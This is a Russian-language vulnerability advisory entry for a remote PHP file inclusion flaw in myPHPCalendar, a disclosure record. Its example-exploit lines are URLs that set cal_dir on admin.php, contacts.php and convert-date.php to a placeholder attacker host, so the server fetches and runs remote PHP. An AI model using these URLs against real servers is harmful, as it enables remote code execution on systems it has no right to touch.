Дата публикации: | 15.10.2003 |
Всего просмотров: | 4439 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: myPHPCalendar 10192000 Build 1 Beta
Описание: Уязвимость обнаружена в myPHPCalendar. Удаленный атакующий может выполнить произвольный PHP код, включая команды операционной системы, на целевой системе. Сценарии 'admin.php', 'contacts.php', и 'convert-date.php' включают файлы из $cal_dir каталога. Удаленный пользователь может определить удаленное местоположение для $cal_dir каталога, чтобы включить и выполнить произвольный PHP сценарий на целевом сервере. Пример/Эксплоит: http://[target]/admin.php?cal_dir=http://[attacker]/ http://[target]/contacts.php? cal_dir=http://[attacker]/ http://[target]/convert-date.php?cal_dir=http://[attacker]/ , где http://[attacker]/vars.inc http://[attacker]/prefs.inc URL производителя: http://myphpcalendar.sourceforge.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно скачать отюда: http://www.phpsecure.info/ |
|
Ссылки: | myPHPCalendar |